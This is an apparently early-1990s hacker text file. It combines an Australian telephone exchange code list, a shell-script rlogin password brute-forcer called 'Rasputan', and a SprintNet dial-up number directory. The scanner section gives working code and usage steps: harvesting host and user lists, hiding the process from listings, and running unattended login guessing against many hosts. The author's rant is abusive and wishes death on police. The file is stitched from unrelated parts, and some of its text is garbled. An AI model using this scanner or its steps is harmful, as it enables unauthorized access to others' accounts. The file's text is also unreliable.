WARX Warburton 104-1 AXE  104                      059 62 4067 CAMBERWELL
WATA Wanalta         ARK  ARK-D                    058 52 1067 SHPX
WATM Watchem         ARK  ARK-M                    054 95 1067 BGNX
WAUB Waubra          ARK  ARK-D                    053 370292  BRAX
WAUP Wallup          SXS  APO-C                    053 981067  HORX
WAYI Adelaide 1 ISDN AXE  1030210/25
WAYX Adelaide 4      AXE
WBES Werribee South  ARK  ARK-D                    03 741 1067 FOOTSCRAY
WBOC Warrnambool MSE ARF  REG-LP PRE REMO          055 621067  WBOX
WBOL Warrnambool     ARF  REG-LP PRE REMO          055 62 1067 WBOX
WBOX Warn'bool Node  AXE  1030208/77               055 62 1067 WBOX
WDGA Wodonga         ARF
WDGW Wodonga West    AXE  RSS-D
WDND Woodend         ARK  ARK-M                    054 22 1067 BGNX
WDNX Woodend 104     AXE  104                      054 22 1067 BGNX
WDOO Woorndoo        ARK  ARK-D                    055 93 1067 WBOX
WDPT Woods Point     ARK  ARK-M                    057 75 2067 SEYX
WDRY Wangandary      SXS  APO-C                    057 21 6067 WANX
WDTE Warrandyte RSS  AXE  RSS-D                    03 873 1067 BOX HILL
WDUC Wallinduc       SXS  APO-B                    055 93 1067 WBOX
WEDN Wedderburn      ARK  ARK-M                    054 95 1067 BGNX
WEMN Wemen           ARK  RCM                      050 26 3939 MILX
WEND Wendouree       SXS  2000                     053 370292  BRAX
WENH Wentworth       ARK  ARK-M                    050 23 8729 MILX
WENX Wendouree RSS   AXE  RSS                      053 37 0292 BRAX
WERE Werribee        ARE  113                      03 741 1067 FOOTSCRAY
WERN Werneth         ARK  ARK-M                    052 312067  GEEX/MOLP
WESG Western Gardens AXE  RSS-D                    FOOTSCRAY
WESS West Essendon   ARE  113                      03 338 1067 FOOTSCRAY
WEUP Walpeup         ARK  ARK-M                    050 92 1067 MILX
WGLS Warragul South  ARK  ARK-M                    056 23 5067 WGUX
WGON Wantagong       ARK  ARK-M
WGPK Warragul 059    AXE  056 23 5067 MWRX
WGUC Warragul MSE    ARF  REG-LP PRE REMO          056 23 5067 WGUX
WGUL Warragul        ARF  REG-LP PRE REMO          056 23 5067 WGUX
WGUX Warragul Node   AXE  1030208/77               056 23 5067 MWRX
WHLL Wheelers Hill   ARE  113                      03 560 1067 WINDSOR
WICC Windsor SA STP  AXE  1030210/25
WICK Wickliffe       SXS  APO-C                    053 521067  HORX
WIEL Wingeel         ARK  ARK-D                    052 312067  GEEX/MOLP
WILB Willenabrina    SXS  APO-C                    053 981067  HORX
WILN Willaura North  ARK  ARK-M                    053 521067  HORX
WILR Wilkur          SXS  APO-C                    053 981067  HORX
WIMS Windsor CMTS 1  AXE  1030208/218              03 526 1433 WINDSOR
WINC Winchelsea      ARK  ARK-M                    052 312067  GEEX/MOLP
WINF Windsor ACD     AXE			   03 526 1230 WINDSOR
WINM Winiam          ARK  ARK-D                    053 911067  HORX
WINN Winton          ARK  ARK-D                    057 62 1067 WANX
WINS Winchelsea Sth. ARK  ARK-D                    052 312067  GEEX/MOLP
WIRC Windsor         ARE  114                      03 510 1067 WINDSOR
WIRD Windsor ACD     AXE			   03 526 1230 WINDSOR
WIRE Windsor Dig Tan AXE  1010606/17               03 526 1067 WINDSOR
WIRF Windsor Tandem  ARF			   03 526 1067 WINDSOR
WIRH Windsor Node    AXE  1010606/17               03 526 1067 WINDSOR
WIRI Windsor ACD     10C			   03 526 1230
WIRM Windsor Man.Ass AXE
WIRP Windsor Mopax   SXS  2000                     WINDSOR
WIRV Windsor Viatel  AXE			   03 526 1401 WINDSOR
WIRW Windsor Pag.BBL 10C
WKBC WarracnabealMSE ARF  REG-LP REMO              053 98 1067 HORX
WKBL Warracknabeal   ARF  REG-LP REMO              053 98 1067 HORX
WKBX Warracknabeal   AXE  104                      053 98 1067 HORX
WLAN Wallan          AXE  104                      057 82 1067 WANX
WLBY Wilby           ARK  ARK-D                    057 44 3067 WANX
WLLE Wallacedale     ARK  ARK-D                    055 730249  HMOX
WLNG Woomelang       ARK  ARK-M                    050 70 1067 SWIX
WLOK Willatook       SXS  APO-C&D                  055 62 1067 WBOX
WLRA Willaura        ARK  ARK-M                    053 521067  HORX
WLRT Wollert         ARK  ARK-D                    03 404 1067 IVANHOE
WLTK Perth 1 ISDN    AXE  1030210/25
WLTY Perth 3         AXE
WLWA Walwa           ARK  ARK-M
WMLL Werrimull       ARK  ARK-D                    050 23 8729 MILX
WMMA Woomargama      ARK  ARK-D
WNET Warneet         ARK  ARK-M                    059 96 1067 DANDENONG
WNHP Warrenheip      ARK  ARK-D                    053 370294  BRAX
WNON Wannon          ARK  ARK-D                    055 730249  HMOX
WOAU Brisbane 2 CMTS AXE
WOBE Brisbane 4      AXE
WOBU Brisbane 1 CMTS AXE
WOBV Brisbane 1 ISDN AXE  1030210/25
WOBW Brisbane 2 ISDN AXE  1020210/72
WOID Woodside        ARK  ARK-D                    051 82 5067 MWRX
WOKE Wooroonook      SXS  APO-C                    054 95 1067 BGNX
WOMB Womboota        ARK  ARK-M                    054 82 1067 BGNX
WONE Wonthaggi       ARF  REG-LP PRE REMO          056 72 1067 MWRX
WONF Wonthaggi MSE   ARF  REG-LP PRE REMO          056 72 1067 MWRX
WONO Wombelano       ARK  ARK-D                    055 85 1067 HMOX
WONR Won Wron        ARK  ARK-D                    051 82 5067 MWRX
WORA Woori Yallock   ARK  ARK-M                    03 735 1067 CAMBERWELL
WORP Woolsthorpe     ARK  ARK-M                    055 730249  WBOX
WOSE Woodhouse       ARK  ARK-D                    055 730249  HMOX
WOVE Willow Grove    ARK  ARK-M                    056 33 1067 WGUX
WPOL Welshpool       ARK  ARK-D                    056 82 2067 MWRX
WRAK Woorak          ARK  ARK-D                    053 911067  HORX
WRBY Warby           SXS  APO-C                    057 21 6067 WANX
WRGE Wooragee        ARK  ARK-M                    057 21 6067 WANX
WRLY Whorouly        ARK  ARK-M                    057 21 6067 WANX
WRNA Wantirna        ARE  113                      03 802 1067 CAMBERWELL
WRRA Wongarra        ARK  ARK-M                    052 376206  GEEX/MOLP
WRWD Warranwood      ARE  113                      03 873 1067 BOX HILL
WSEA Whittlesea      ARK  ARK-D                    03 404 1067 IVANHOE
WTON Williamstown    ARF  REG-LM                   03 391 1067 FOOTSCRAY
WUMS Windsor CMTS 2  AXE  1030208/218              03 526 1433 WINDSOR
WUNG Willung         SXS  APO-C                    051 74 1067 TAGX
WYCF Wycheproof      ARK  ARK-M                    054 95 1067 BGNX
WYER Wye River       ARK  ARK-M                    052 891206  GEEX/MOLP
WYMA Wymah           ARK  ARK-D
WYUN Wyuna           ARK  ARK-D                    058 52 1067 SHPX
XBEQ Bendigo PABX    AXE
XBRH Ballarat 000    AXE
XGEQ Geelong PABX    SXS  2000                     GEEX/MOLP
XSAQ Sale PABX       SXS  2000                     SALG
XSWQ Swan Hill PABX  SXS  2000                     050 32 4567
YAAP Yaapeet         ARK  ARK-M                    053 981067  HORX
YABN Yabba North     SXS  APO-C                    058 21 2067 SHPX
YAGN Yarra Glen      ARK  ARK-D                    03 735 1067 CAMBERWELL
YAHA Yanakie         ARK  ARK-M                    056 82 2067 MWRX
YAJN Yarra Junction  AXE  104                      03 735 1067 CAMBERWELL
YALC Yalca           ARK  ARK-D                    058 62 1067 SHPX
YALN Yallourn North  ARK  ARK-M                    051 34 1067 MWRX
YAMB Yambuk          ARK  ARK-M                    055 62 1067 WBOX
YANC Yanac           ARK  ARK-M                    053 911067  HORX
YANS Yannathan       ARK  ARK-M                    059 41 1067 DANDENONG
YARN Yarragon        ARK  ARK-M                    056 33 1067 WGUX
YEAA Yea             ARK  ARK-M                    057 92 1067 SEYX
YEND Yendon          ARK  ARK-M                    053 370294  BRAX
YEOD Yeodene         SXS  APO-C                    052 312067  GEEX/MOLP
YERB Yarraberb       ARK  ARK-M                    054 43 1067 BGNX
YEUN Yeungroon       ARK  ARK-M                    054 95 1067 BGNX
YGBO Yellingbo       ARK  ARK-M                    03 735 1067 CAMBERWELL
YIEL Yielima         ARK  ARK-M                    058 62 1067 SHPX
YINN Yinnar          ARK  ARK-D                    051 34 1067 MWRX
YINS Yinnar South    ARK  ARK-M                    051 34 1067 MWRX
YKDH Yackandandah    ARK  ARK-D
YMBT Yarrambat       ARK  ARK-D                    03 435 1067 IVANHOE
YOIT Yandoit         ARK  ARK-D                    054 72 1067 BGNX
YOUN Youngvale       SXS  APO-C                    053 825067  HORX
YRAC Yarram MSE      ARF  REG-LP PRE REMO          051 82 5067 MWRX
YRAM Yarram          ARF  REG-LP PRE REMO          051 82 5067 MWRX
YRCK Yarck           ARK  ARK-M                    057 72 1067 SEYX
YULE Yulecart        SXS  APO-C&D                  055 730249  HMOX
YUUL Yuulong         ARK  ARK-M                    052 312067  GEEX/MOLP
YWGA Yarrawonga      SXS  DSR                      057 44 3067 WANX
YWGC Yarrawonga MSE  SXS  2000                     057 443067  WANX
YWGX Ya'wonga 104-1  AXE  104                      057 443067  WANX
YWGY Ya'wonga 104-2  AXE  104                      057 443067  WANX
YYAH Yarroweyah      ARK  ARK-M                    058 72 1067 SHPX


                        []       - Rasputan -       []
                        []                          []
                        [] Rlogin Scanner/Sprinter  []
                        []                          []
                        []           By             []
                        []                          []
                        []    The Chthonic Hvee     []

You think I like writing all these boring bits ? How about I revert to
the self-worshiping, rap-head, virgin 15 year old fuckwit style?


Codes man! If you want them, then this is your love tool (hehehe).


Oh fuck it. Fuck you for that matter.

                              I'm depressed.

 I was arrested yesterday, on pathetic charge - one pig punched me after he
worked out I had said he was a shallow, predictable moron. As a reflexive
reaction I went to hit him back, and other 4 cops all drew their guns and
pointed them at my body.

 I hate been powerless.

Well, mayhap they die a death of slow cancer, eating them up from the inside.

If you look far enough into the future, it is allways very unhappy. Sun glasses
are cool in that respect - you know what I mean.

I think I shall and go and make passionate love to my female. She understands
this sort of bullshit.


  If you can, make a link with rlogin, awk, sleep etc, so the proccess list
reflects lies.

Make a list of hosts, e.g

% egrep '\.' /etc/hosts|awk '{print $2}' >hosts


% ypcat hosts|egrep '\.'|awk '{print $2}' >hosts

Make a list of usernames and passwords, the most likely ones towards the top of
the list. e.g user and pass.

If you are able to obtain a /etc/passwd list for the system with out the
encrypted passwords (e.i FTP or TFTP/UUCP & shadows) then use the following...

% awk <passwd -F: '{print $1'} >user

Edit rasputan, and set "delay" to be what ever you think your system, the link
and the remote system can handle. Some systems will have process limits, so you
must keep that in mind or use the root account (no limit). If you are tieing up
too much of the TCP/IP bandwith and or CPU time, rlogin will take too long to
connect to the target system(s), and Rasputan will give false results.

% nohup rasputan hosts user pass >& logerr &

or from /bin/sh

$ nohup rasputan hosts user pass 1> logerr 2>&1 &

Rasputan checks like this...


i.e it tries -	host#1, account#1, password#1
host#2, account#1, password#1


host#1, account#1, password#2


host#1, account#2, password#1

Which for several reasons is the best way to do things.

A log of every sprint attempt will be in ./splog$$, and the results in

  - Hvee

----------------------------------> Rasputan <---------------------------------

#Rasputan v1.0, by TCH, July 1991

echo >$log "Rasputan Starting up..."
echo >>$log "Delay set at $delay"
echo >>$log "Output will be in $out"
good() {
       (sleep 20;echo $pass;sleep 12)|rlogin $host -l $name | \
       awk '$0 !~/[Ii]ncorrect/&& $0 !~/[Ii]nvalid/&& $0 !~/[Pp]assword:/&& $0 !~/[Ll]ogin:/';}

checkit() {
if [ "`good`" != "" ]
       echo $host,$name,$pass >>$out

for name in `cat $2`
 for pass in $name `cat $3`
   for host in `cat $1`
     echo >>$log "Trying: $host			UN:$name		PW:$pass"
     checkit &      
     sleep $delay
sleep 40
echo "Finnished.">>$log

--------------------------> cut/kill/chop/slice/dice <-------------------------




                                &&                    &&
                                && SprintNet dialups  &&
                                &&                    &&
                          	&&    Obtained b,     &&
   				&&                    &&
                           	&& The Chthonic Hvee  &&
   				&&                    &&

 I couldn't give a shit about Sprint or SprintNet. Infact if the USA ceased to
exist at this very point in time, I for one would think maybe all that praying
they do over there finnaly has done some good.


Welcome to US Sprint's online directory of SprintNet local access
telephone numbers.

SprintNet's Dial Access Services provie you access to the SprintNet
data network 24 hours a day for reliable data transmission across
town and worldwide.  You can access the network with a local phone
call from thousands of cities and towns or by using SprintNet
In-WATS service.  The network is lso accessible from nearly 100
international locations.

Depend on SprintNet's Dial Access Services for:

 * dial-up flexibility with access on demand
 * error protected network transmission and
 * 24-hour customer service and network management

For custoer serice, call toll-free 1-800/336-0437.  From overseas
locations with non-WATS access, call 703/689-6400.


 - for asynchronous applications
 - at 300, 1200, 2400 and 9600 bps
 - with optional local error protection

Asynchronous Dial Service enables you to conveniently access the
SprintNet data network with a local telephone call from thousands
of U.S. cities and towns.  For areas without local access in the
U.S., use SprintNet's In-WATS service.

In-WATS Service    Telephone Number
300-2400 bps       1-800/546-1000
9600 bps (V.29)    1-800/546-2000
9600 bps (V.32)    1-800/546-2500

Consult the Data Network Rate Schedule for In-WATS picing.

Domestic Service Requirements
SPEED:            MODEM TYPE:
300 bps          Bell 103 compatible
1200 bps          Bell 212A compatible
2400 bps          V.22 bis compatible
9600 bps (V.29)   Microcom V.29 compatible
9600 bps (V.32)   CCITT V.32 compatible

Optional Local Error Protection
When using local error protection for speeds of 2400 bps or less,
your modem must be MNP compatible, or you canuse MNP compatible
software in your PC.  For V.29 9600 bps service, your modem must
be MNP compatible.  For V.32 9600 bps service, your modem should
be MNP or V.42 compatible.

Note:  Dial the 2400 bps access number when using local error
      protection at 300, 1200 or 2400 bps.


                            300/1200              2400
ST AC     CITY                 BPS                BPS            CLASS
In-WATS 800                  546-1000            546-1000            -

AL 205 Anniston              236-9711                                B
AL 205 Birmingham            328-2310            251-185            B
AL 205 Decatur               355-0206                                B
AL 205 Dothan                793-5034                                B
AL 205 Florence              767-7960            767-0497            B
AL 205 Huntsville           539-2281            539-1631            B
AL 205 Mobile                432-1680            438-6881            B
AL 205 Montgomery            269-0090            832-4314            B
AL 205 Tuscaloosa            752-1472            758-5799            C

Additional Local Access from Alabama
Local access is also available in many areas from BellSouth Advanced
Networks (BSAN) via PulseLink.  For local access telephone numbers
and sign-on procedures, contact BSAN Customer Service at 1-800/NCC-BSAN

AK 907 Anchorage             276-0453  (2)       276-0453            -
AK 907 Barrow                852-2425  (1,2)                         -
AK 907 Bethel                543-2411  (1,2)                         -
AK 907 Cold Bay              532-2371  (1,2)                         -
AK 907 Cordova               424-3744  (1,2)                         -
AK 907 Deadhorse             659-2777  (1,2)                         -
AK 907 Delta Junction        895-5070  (1,2)                         -
AK 907 Dillingham            842-2688  (1,2)                        -
AK 907 Fairbanks             456-3282  (1,2)                         -
AK 907 Glennallen            822-5231  (1,2)                         -
AK 907 Homer                 235-5239  (1,2)                         -
AK 907 Iliamna               571-1364  (1,2)                        -
AK 907 Juneau                789-7009  (1,2)                         -
AK 907 Ketchikan             225-1871  (1,2)                         -
AK 907 King Salmon           246-3049  (1,2)                         -
AK 907 Kodiak                486-4061  (1,2)                         -
AK 907 Kotzebue             442-2602  (1,2)                         -
AK 907 McGrath               524-3256  (1,2)                         -
AK 907 Nome                  443-2256  (1,2)                         -
AK 907 Northway              778-2301  (1,2)                        -
AK 907 Palmer                745-0200  (1,2)                         -
AK 907 Prudhoe Bay           659-2777  (1,2)                         -
AK 907 St Paul               546-2320  (1,2)                         -
AK 907 Seward                224-3126  (1,2)                         -
AK 907 Sitka                 747-5887  (1,2)                         -
AK 907 Soldotna              262-1990  (1,2)                         -
AK 907 Talkeetna             733-2227  (1,2)                         -
AK 907 Tanana                366-7167 (1,2) (300 BPS ONLY)          -
AK 907 Valdez                835-4987  (1,2)                         -
AK 907 Whittier              472-2467  (1,2)                         -
AK 907 Yakutat               784-3453  (1,2)                         -
AZ 602 Phoenix               254-0244            256-6955           A
AZ 602 Flagstaff             773-0588            773-0588            B
AZ 602 Tucson                747-0107            747-9395            B

Additional Local Access from Arizona
Local access is also available in many areas via US WEST's packet
switched network, Digipac.  For local access telephone numbers and
sign-on procedures, contact US WEST Marketing at 303/965-7012.

AR 501 Fayetteville          442-0212            442-0212            B
AR 501 Ft Smith              782-2852                                C
AR 501 Hot Springs           623-3159            623-3159            B
AR 501 Little Rock           372-4616            374-2861            B
AR 501 Texarkana             772-6181            772-6181            B
CA 805 Bakersfield           327-8146            327-5321            B
CA 916 Chico                 894-6882                                B
CA 714 Colton                824-9000            824-8976            B
CA 213 Compton               516-1007                                C
CA 415 Concord               827-3960            674-0127            C
CA 916 Davis                 753-4387            753-4387            B
CA 619 Escondido             741-7756            741-9536            B
CA 707 Eureka                444-3091                               B
CA 415 Fremont               490-2050            490-2050            B
CA 209 Fresno                233-0961            441-1861            B
CA 714 Garden Grove          898-9820            895-1207            B
C 818 Glendale              507-0909            246-3886            B
CA 415 Hayward               881-1382            727-1708            B
CA 213 Los Angeles           624-2251            622-1138            A
CA 213 Los Angeles           937-3580            622-1138            A
CA 213 Marina Del Rey       306-2984            306-4922            B
CA 209 Merced                383-2557                                B
CA 209 Modesto               576-2852                                B
CA 408 Monterey              646-9092            6465122            C
CA 213 Norwalk               404-2237                                C
CA 415 Oakland               836-4911            834-3194            B
CA 619 Oceanside             430-0613                                C
CA 619 Palm Springs          951-2612            951-2612            B
CA 415 Palo Alto             856-9995            856-0484            B
CA 415 Pinole                724-2400            724-2225            C
CA 714 Pomona                626-1284                                C
CA 916 Redding               43-0690            243-0690            B
CA 916 Sacramento            448-6262            443-7434            B
CA 408 Salinas               443-4940            443-8791            B
CA 415 San Carlos            591-0726            595-8870            B
CA 619 San Diego             233-0233            231-1703           B
CA 415 San Francisco         956-5777            788-0825            A
CA 408 San Jose              294-9119            286-6340            B
CA 213 San Pedro             548-6141            514-1590            B
CA 415San Rafael            472-5360            472-2550            C
CA 415 San Ramon             829-6705                                B
CA 714 Santa Ana             558-7078            550-4625            B
CA 805 Santa Barbara         682-5361            564-1158            B
CA 408 Santa Cruz            429-6937            429-9192            C
CA 805 Santa Maria           925-7039            925-7039            B
CA 707 Santa Rosa            578-4447            578-1055            C
CA 209 Stockton              957-7610            957-7627            C
A 805 Thousand Oaks         495-3588                                B
CA 805 Ventura               656-6760            650-1070            B
CA 209 Visalia               627-1201                                B
CA 818 West Covina           915-5151            915-0349            C
CA 818 Woodland Hills        887-3160            348-7141            B

Additional Local Access from California
Local access is also available in many areas from Pacific Bell via
the Public Packet Switching Networ.  For local access telephone
numbers and sign-on procedures, contact Pacific Bell at 811-5273
(inside California) or at 1-916/972-5273 (outside California).

CO 719 Colorado Springs      635-5361            635-2551            B
CO 303 Denver                337-6060            696-0159            A
CO 303 Ft Collins            493-9131            493-4014            B
CO 303 Grand Junction        241-3004                                C
CO 303 Greeley               352-8563                                B
CO 719 Pueblo                542-4053                                C

Additional Local Access from Colorado
Local access is also available in many areas via US WEST's packet
switched network, Digipac.  For local access telephone numbers and
sign-on procedures, contact US WEST Marketing at 303/965-7012.

CT 203 Bridgeport            335-5055            367-9130            B
CT 203 Danbury               794-9075            792-5354            B
CT 203 Hartford              247-9479            724-9396            B
CT 203 Middetown            344-8217                                B
CT 203 New Britain           225-7027                                B
CT 203 New Haven             624-5954            773-3569            B
CT 203 New London            447-8455           437-0909            B
CT 203 Norwalk               866-7404                                B
CT 203 Stamford              348-0787            359-9404            B
CT 203 Waterbury             753-4512            756-0342            C

Additional Local Access from Connecticut
Local access is also available statewide via Southern New England
Telephone Company's packet switched network, ConnNet.  For local
access telephone numbers and sign-on procedures, contact SNET's
Enhanced Services Group at 1-80/367-6815.

DE 302 Dover                 678-8328                                B
DE 302 Newark                454-7710            737-4340            B

Additional Local Access from Delaware
Local access is also available in many reas from Diamond State
Telephone Company via Bell Atlantic's Public Data Network.  For
local access telephone numbers and sign-on procedures, contact
Bell Atlantic at 1-800/444-5551.

DC 202 Washington            429-7896            429-0956            A
DC 202Washington            429-7800            429-0956            A

Additional Local Access from the District of Columbia
Local access is also available in many areas from C&P Telephone
Company via Bell Atlantic's Public Data Network.  For local acces
telephone numbers and sign-on procedures, contact Bell Atlantic at

FL 407 Boca Raton            338-3701                                C
FL 813 Cape Coral            275-7924            275-4153            C
L 407 Cocoa Beach           267-0800                                B
FL 904 Daytona Beach         255-2629                                C
FL 305 Ft Lauderdale         764-4505            524-5304            B
FL 407 Ft Pierce             466-4566            466-4566            B
FL 904 Gainesville           338-0220            338-1700            B
FL 904 Holly Hill            257-4770            257-4770            B
FL 904 Jacksonville          353-1818            791-9201            B
FL 813 Lakeland              683-5461            687-0666            
FL 904 Leesburg              787-0799            787-0799            B
FL 407 Melbourne             242-8247                                C
FL 305 Miami                 372-0230            372-1355            A
FL 813 Naples                263-3033                                C
FL 904 Ocala                 351-3790            351-0263            C
FL 407 Orlando               422-4088            422-8858            B
FL 904 Panama City           763-8377            763-8377            B
FL 904 Pensacola             432-1335            43-2103            C
FL 305 Pompano Beach         941-5445                                C
FL 813 St Petersburg         323-4026            327-1163            B
FL 813 Sarasota              923-4563            925-1499            C
FL 904 Tallahassee           681-1902            561-8830            B
FL 813 Tampa                 224-9920            223-5859            B
FL 904 Valparaiso            897-3421            897-3421            B
FL 407 West Palm Beach       833-6691            655-2993            B

Addditional Local Accss from Florida
Local access is also available in many areas from BellSouth Advanced
Networks (BSAN) via PulseLink.  For local access telephone numbers
and sign-on procedures, contact BSAN Customer Service a 1-800/NCC-BSAN

Local access is also available in the Tallahassee area via the CENTEL
Packet Switching Network.  For local access information, contact CENTEL
Marketing at 904/878-4800.

GA 912 Albany                888-3011            431-9384            C
GA 404 Athens                548-5590            548-9698            B
GA 404 Atlanta               523-0834            584-0212            A
GA 404 Augusta               724-2752            724-4494            B
GA 404 Columbus              571-0556            323-893           B
GA 404 Gainsville            532-9880            532-9880            B
GA 912 Macon                 743-8844            741-2108            C
GA 404 Rome                  234-1428                                B
GA 912 Savannah              236-2605            236-2875            B

dditional Local Access from Georgia
Local access is also available in many areas from BellSouth Advanced
Networks (BSAN) via PulseLink.  For local access telephone numbers
and sign-on procedures, contactBSAN Customer Service at 1-800/NCC-BSAN

HI 808 Oahu                  528-0200            528-0200  (2)       -
HI 800 Other Islands         272-5299            272-5299  (2)       -
ID 208 Boise                 343-0611            343-1272            B
ID 208 Idaho Falls          529-0406            529-0406            B
ID 208 Lewiston              743-0099            743-5885            C
ID 208 Pocatella             232-1764            232-1764            B
IL 708 Arlington Heights     255-6465            255-6465            A
IL 708 Aurora                896-0620            896-3363            B
IL 618 Belleville            277-5483            277-5483            B
IL 309 Bloomington           827-7000            828-2573            B
IL 312 Chicago               938-0600            938-8725            A
IL 217 Decatur               429-0235            429-6054            C
IL 815 Dekalb                758-2623            758-5046            B
IL 708 Glencoe               835-8037            835-8037            B
IL 815 Joliet                726-0070            726-8731            C
IL 708 Libertyville          362-7838            362-7838            B
IL 708 Naperville            355-2910            355-2910            B
IL 309 Peoria                637-8570            637-8582            B
IL 815 Rockford              965-0400            965-0696            B
IL 217 Springfield           753-1373            753-1391            B
IL 217 Urbana                384-6428            328-0317            B

Addditional Local Access from Illinois
Local access is also available in many areas from Illinois Bell via
the Ameritech Packet Switched Network.  For local access information,
contact Ameritech at 1-800/242-8580 ext. A75.

Local access is also available in the Park Ridge and Des Plaines
areas via the CENTEL Packet Switching Network.  For local access
information, contact CENTEL Marketing at 708/391-4075.

IN 812 Bloomington           332-1344                                C
IN 812 Evansville            424-7693            428-2522            B
IN 219 Ft Wayne              426-2268            422-3431            B
IN 219 Gary                  882-8800            882-1835            B
IN 317 Indianapolis          299-0024            299-6766            B
IN 317 Kokomo                455-2460            452-0073            C
IN 317 Lafayette             742-6000                                C
IN 317 Muncie                282-6418            288-1113            C
IN 219 South Bend            233-7104            233-4031            B
IN 812 Terre Haute           232-5329            234-4119            C

Additional Local Accessfom Indiana
Local access is also available in many areas from Indiana Bell via
the Ameritech Packet Switched Network.  For local access information,
contact Ameritech at 1-800/242-8580 ext. A75.

IA 515 Ames                  233-6300            233-2603            C
IA 319 Burlington            752-2516            752-2516            B
IA 319 Cedar Rapids          364-0911            362-2764            B
IA 319 Davenport             324-2445            324-8902            C
IA 515 Des Moines            288-4403            288-6206            B
IA 319 Dubuque               556-0783                                C
IA 319 Iowa City             351-1421            354-0676            C
IA 712 Sioux City            255-1545                               C
IA 319 Waterloo              232-5441            232-0195            B
KS 913 Lawrence              843-8124                                B
KS 913 Leavenworth           651-0015            651-0015            B
KS 913 Manhattan             537-0948                                B
KS 913 Salia                825-7900                                B
KS 913 Topeka                233-9880            233-4660            B
KS 316 Wichita               262-5669            262-7961            B
KY 502 Bowling Green         782-794            782-6380            B
KY 502 Frankfort             875-4654            875-1942            B
KY 606 Lexington             233-0312            233-7217            B
KY 502 Louisville            589-5580            583-1006            B
KY 502 Owensboro             686-8107                                B
LA 318 Alexandria            445-1053                                B
LA 504 Baton Rouge           343-0753            343-0771            A
LA 318 Lafayette             233-0002            234-8451            B
LA 318 Lake harles          436-0518                                C
LA 318 Monroe                387-6330            322-9826            B
LA 504 New Orleans           524-4094            522-3967            A
LA 318 Shreveport            221-5833            424-2255            B
ME 207 Augusta               622-3123            622-7364            B
ME 207 Brewer                989-3081                                C
ME 207 Lewiston              784-0105                                C
ME 207 Portland              761-4000                                
MD 301 Annapolis             224-8550            224-0795            B
MD 301 Baltimore             727-6060            752-5555            A
MD 301 Frederick             293-9596                                B

Additional Loca Access from Maryland
Local access is also available in many areas from C&P Telephone
Company via Bell Atlantic's Public Data Network.  For local access
telephone numbers and sign-on procedures, contact Bell Atlantic
at 1-800/444-5551.

MA 617 Boston               292-0662            574-9244            A
MA 508 Brockton              580-0721                                B
MA 617 Dedham                326-4064            326-4064            B
MA 508 Fall River            677-4477                               B
MA 508 Framingham            879-6798                                B
MA 508 Lawrence              975-2273            683-0680            B
MA 617 Lexington             863-1550            863-1745            B
MA 508 Lowell                937-5214            453-8803            B
MA 508 New Bedford           999-2915            999-9667            B
MA 413 Northampton           586-0510                                C
MA 413 Pittsfield            499-7741                                B
MA 508 Salem                 744-1559                               B
MA 413 Springfield           781-3811            737-9285            B
MA 508 Woods Hole            540-7500            457-9390            C
MA 508 Worcester             755-4740            792-1785            B
MI 313 Ann Arbor             996-5995            665-2900            A
MI 616 Battle Creek          968-0929            968-9851            B
MI 313 Detroit               964-2988            963-2274            A
MI 313 Flint                 235-8517            235-5477            B
MI 616 Grand Rapid          774-0966            774-0131            B
MI 517 Jackson               782-8111                                C
MI 616 Kalamazoo             345-3088            345-3122            B
MI 517 Lansing               484-0062            484-6301            B
MI 517 Midland               832-7068                               B
MI 616 Muskegon              726-5723                                C
MI 313 Pontiac               332-5120            332-5979            B
MI 313 Port Huron            982-8364                                B
MI 517 Saginaw               790-5166            799-3190            B
MI 313 Southfield            827-4710                                B
MI 616 Traverse City         946-2121                                C
MI 313 Warren                575-9152            558-8460            B
MI 313 Wayne                 326-4210            326-4210            B

Additional Local Access from Michigan
Local access is also available in many areas from Michigan Bell via
the Ameritech Packet Sitched Network.  For local access information,
contact Ameritech at 1-800/242-8580 ext. A75.

MN 218 Duluth                722-1719            722-5032            B
MN 507 Mankato               388-3780                                B
MN 612 Minneapolis           341-2459            338-1661            A
MN 507 Rochester             282-5917            282-0253            C
MN 612 St Cloud              253-2064                                C

Additional Local Access from Minnesota
Local access is also vailable in many areasvia US WEST's packet
switched network, Digipac.  For local access telephone numbers and
sign-on procedures, contact US WEST Marketing at 303/965-7012.

MS 601 Hattiesburg           264-0815            264-0815            B
MS 61 Gulfport             863-0024                                B
MS 601 Jackson               969-0036            969-0152            B
MS 601 Meridian              482-2210                                B
MS 601 Starkville            324-2155                                B
MO 314 Columbia              449-4404           443-3432            B
MO 314 Jefferson City        634-5178            634-8436            C
MO 816 Kansas City           221-9900            472-1430            A
MO 314 St Charles            723-5179            723-5179           B
MO 816 St Joseph             279-4797                                C
MO 314 St Louis              421-4990            421-0381            A
MO 417 Springfield           864-4814            864-4945            B
MT 406 Billings              245-7649            248-6373            C
MT 406 Great Falls          771-0067                                B
MT 406 Helena                443-0000            443-0527            B
MT 406 Missoula              721-5900            543-5575            C
NE 308 Grand Island          381-2049           381-2049           B
NE 402 Lincoln               475-4964            475-3839            B
NE 402 Omaha                 341-7733            346-6419            B

Additional Local Access from Nebraska
Local access is also available in many ara via US WEST's packet
switched network, Digipac.  For local access telephone numbers and
sign-on procedures, contact US WEST Marketing at 303/965-7012.

NV 702 Las Vegas             737-6861            737-5466            B
NV 702 Reno                 827-6900            827-5290            B

Additional Local Access from Nevada
Local access is also available in the Las Vegas area via the CENTEL
Packet Switching Network.  For local access information, contact
CENTEL at 702/877-744.

NH 603 Concord               224-1024            225-8710            B
NH 603 Durham                868-2924                                B
NH 603 Manchester            627-8725            625-8088            B
NH 603 Nashua                880-6241            880-301            C
NH 603 Portsmouth            431-2302            431-7592            B
NJ 609 Atlantic City         348-0561            344-8571            B
NJ*908 Freehold              780-5030            780-9122            B
NJ 201 Hackensack            488-6567            488-2063            B
NJ 609 arlton               596-1500            596-8659            B
NJ 609 Merchantville         663-9297            665-6860            B
NJ 201 Morristown            455-0275            644-4745            B
NJ*908 New Brunswick         75-2900            745-7010            B
NJ 201 Newark                623-0469            623-7122            A
NJ 201 Passaic               778-5600            773-3674            B
NJ 201 Paterson              684-7560            742-4415            B
NJ 609 Princeton             799-5587            936-0231            A
NJ*908 Rahway                815-1885                                B
NJ*908 Redbank               571-0003                                B
NJ 201 Roseland              227-5277            227-6722            B
NJ*908 ayreville            525-9507                                B
NJ*908 Summit                273-9619            273-9619            B
NJ 609 Trenton               989-8847            989-7127            B

Additional Local Access from New Jersey
Local access is also available in many areas from New Jersey Bell
via Bell Atlantic's Public Data Network.  For local access telephone
numbers and sign-on procedures, contact Bell Atlantic at 1-800/

NM 505 Albuquerque          243-4479            242-1742            B
NM 505 Las Cruces            526-9191                                B
